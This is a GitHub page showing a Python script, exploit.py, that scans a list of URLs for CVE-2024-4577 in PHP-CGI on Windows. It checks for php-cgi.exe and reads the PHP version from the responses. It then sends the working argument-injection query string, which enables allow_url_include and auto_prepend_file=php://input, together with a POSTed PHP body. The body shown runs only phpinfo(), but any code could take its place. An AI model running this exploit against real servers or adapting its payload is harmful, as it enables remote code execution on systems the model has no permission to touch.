-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathexploit.py
85 lines (80 loc) · 3.06 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
import requests
from urllib.parse import urlparse
import re
def send_request(url: str, method: str, data: str, timeout: int=5) -> requests.models.Response:
try:
if method == 'GET':
res = requests.get(url, timeout=timeout, verify=False)
elif method == 'POST':
res = requests.post(url, data=data, timeout=timeout, verify=False)
else:
return None
except requests.exceptions.Timeout:
return None
except requests.exceptions.ConnectionError:
return None
return res
def check_connectivity(url: str) -> bool:
res = send_request(url, 'GET', '')
return res is not None
def check_cgi_exist(url: str) -> bool:
res = send_request(url + "/php-cgi/php-cgi.exe", 'GET', '')
if res is None:
return False
return res.status_code == 500
def get_phpversion(url: str) -> str:
res = send_request(url + "/php-cgi/php-cgi.exe", 'GET', '')
if res is None:
return ''
version = ''
if res.headers.get('X-Powered-By'):
if 'PHP' in res.headers['X-Powered-By']:
version += res.headers['X-Powered-By'] + ' '
if res.headers.get('Server'):
if 'PHP' in res.headers['Server']:
version += res.headers['Server'] + ' '
version_text = re.findall(r'PHP\/\d*\.\d*\.\d*', res.text)
if version_text:
version += ''.join(version_text)
return version
def exploit(url: str) -> bool:
res = send_request(url + "/php-cgi/php-cgi.exe" +
"?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input",
method='POST', data="<?php phpinfo();?>")
if res is None:
return False
version_text = re.findall(r'PHP Version \d*\.\d*\.\d*', res.text)
return len(version_text) > 0
def header():
print('Testing CVE-2024-4577')
print('vulnerable version: 5.0.0 - 8.1.28, 8.2.0 - 8.2.19, 8.3.0 - 8.3.7')
def main():
COLOR_RED = '\033[0;31m'
COLOR_YELLOW = '\033[0;33m'
COLOR_CLEAN = '\033[0m'
urls = open('urls.txt', 'r').readlines()
for url in urls:
url = url.strip()
if url == 'None':
continue
if not url.startswith('http'):
url = 'http://' + url
urlinfo = urlparse(url)
url = urlinfo.scheme + '://' + urlinfo.netloc
cgi_exist = '?'
phpversion = '?'
exp_result = '?'
connected = check_connectivity(url)
if connected:
cgi_exist = check_cgi_exist(url)
phpversion = get_phpversion(url)
exp_result = exploit(url)
print(f'Testing: {url}' +
f' {COLOR_YELLOW if not connected else COLOR_CLEAN}{connected=}{COLOR_CLEAN}' +
f' {COLOR_RED if cgi_exist is True else COLOR_CLEAN}{cgi_exist=}{COLOR_CLEAN}' +
f' {phpversion=}' +
f' {COLOR_RED if exp_result is True else COLOR_CLEAN}{exp_result=}{COLOR_CLEAN}'
)
if __name__ == '__main__':
header()
main()